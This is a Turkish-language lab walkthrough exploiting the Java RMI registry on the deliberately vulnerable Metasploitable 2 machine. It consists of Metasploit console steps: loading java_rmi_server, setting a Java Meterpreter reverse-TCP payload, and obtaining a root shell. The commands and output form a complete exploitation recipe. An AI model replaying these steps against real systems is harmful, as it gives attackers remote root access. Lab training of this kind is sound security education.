Metasploitable 2 Exploit Java RMI Registry

Exploit # 10: Java RMI Registry

Java RMI  (Remote Method Invocation – Uzak Metod Çağrısı)ile bir makina üzerinde çalışan bir java nesnesinin, başka bir makina üzerinde çalışan diğer bir java nesnesinin metodunun çağırmasını sağlanır.nmapte 1099 portunda çalıştığı görülebilir.

1099/tcp open  java-rmi          Java RMI Registry

 

msf > search java rmi

Matching Modules

================

  Name                                               Disclosure Date       Rank    Description

  —-                                               —————       —-    ———–

  auxiliary/scanner/misc/java_rmi_server             2011-10-15 00:00:00 UTC  normal Java RMI Server Insecure Endpoint Code Execution Scanner

  exploit/multi/browser/firefox_xpi_bootstrapped_addon  2007-06-27 00:00:00 UTC  excellent  Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution

  exploit/multi/browser/java_rmi_connection_impl     2010-03-31 00:00:00 UTC  excellent  Java RMIConnectionImpl Deserialization Privilege Escalation

  exploit/multi/browser/java_signed_applet           1997-02-19 00:00:00 UTC  excellent  Java Signed Applet Social Engineering Code Execution

  exploit/multi/misc/java_rmi_server                 2011-10-15 00:00:00 UTC  excellent  Java RMI Server Insecure Default Configuration Java Code Execution

 

 

msf > use exploit/multi/misc/java_rmi_server

msf exploit(java_rmi_server) > show options

 

Module options (exploit/multi/misc/java_rmi_server):

  Name Current Setting  Required  Description

  —- —————  ——–  ———–

  RHOST                  yes    The target address

  RPORT 1099          yes    The target port

  SRVHOST  0.0.0.0       yes    The local host to listen on. This must be an address on the local machine or 0.0.0.0

  SRVPORT  8080          yes    The local port to listen on.

  SSLCert                no     Path to a custom SSL certificate (default is randomly generated)

  URIPATH                no     The URI to use for this exploit (default is random)

 

Exploit target:

  Id  Name

  —  —-

  0   Generic (Java Payload)

 

msf exploit(java_rmi_server) > set RHOST 172.16.52.133

RHOST => 172.16.52.133

msf exploit(java_rmi_server) > show payloads

 

Compatible Payloads

===================

  Name                         Disclosure Date  Rank Description

  —-                         —————  —- ———–

  generic/custom                                normal  Custom Payload

  generic/shell_bind_tcp                        normal  Generic Command Shell, Bind TCP Inline

  generic/shell_reverse_tcp                     normal  Generic Command Shell, Reverse TCP Inline

  java/meterpreter/bind_tcp                     normal  Java Meterpreter, Java Bind TCP Stager

  java/meterpreter/reverse_http                 normal  Java Meterpreter, Java Reverse HTTP Stager

  java/meterpreter/reverse_https                normal  Java Meterpreter, Java Reverse HTTPS Stager

  java/meterpreter/reverse_tcp                  normal  Java Meterpreter, Java Reverse TCP Stager

  java/shell/bind_tcp                           normal  Command Shell, Java Bind TCP Stager

  java/shell/reverse_tcp                        normal  Command Shell, Java Reverse TCP Stager

  java/shell_reverse_tcp                        normal  Java Command Shell, Reverse TCP Inline

 

msf exploit(java_rmi_server) > set PAYLOAD java/meterpreter/reverse_tcp

PAYLOAD => java/meterpreter/reverse_tcp

msf exploit(java_rmi_server) > show options

 

Module options (exploit/multi/misc/java_rmi_server):

  Name Current Setting  Required  Description

  —- —————  ——–  ———–

  RHOST 172.16.52.133 yes    The target address

  RPORT 1099          yes    The target port

  SRVHOST  0.0.0.0       yes    The local host to listen on. This must be an address on the local machine or 0.0.0.0

  SRVPORT  8080          yes    The local port to listen on.

  SSLCert                no     Path to a custom SSL certificate (default is randomly generated)

  URIPATH                no     The URI to use for this exploit (default is random)

 

Payload options (java/meterpreter/reverse_tcp):

  Name   Current Setting  Required  Description

  —-   —————  ——–  ———–

  LHOST                yes    The listen address

  LPORT  4444          yes    The listen port

 

Exploit target:

  Id  Name

  —  —-

  0   Generic (Java Payload)

 

msf exploit(java_rmi_server) > set LHOST 172.16.52.128

LHOST => 172.16.52.128

msf exploit(java_rmi_server) > exploit

 

[*] Started reverse handler on 172.16.52.128:4444

[*] Using URL: http://0.0.0.0:8080/C1hSIMNHzUBhZl

[*]  Local IP: http://172.16.52.128:8080/C1hSIMNHzUBhZl

[*] Connected and sending request for http://172.16.52.128:8080/C1hSIMNHzUBhZl/NBYBflIh.jar

[*] 172.16.52.133 java_rmi_server – Replied to request for payload JAR

[*] Sending stage (30216 bytes) to 172.16.52.133

[*] Meterpreter session 1 opened (172.16.52.128:4444 -> 172.16.52.133:35076) at 2013-07-28 14:28:35 +0300

[+] Target 172.16.52.133:1099 may be exploitable…

[*] Server stopped.

 

meterpreter > shell

Process 1 created.

Channel 1 created.

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami

root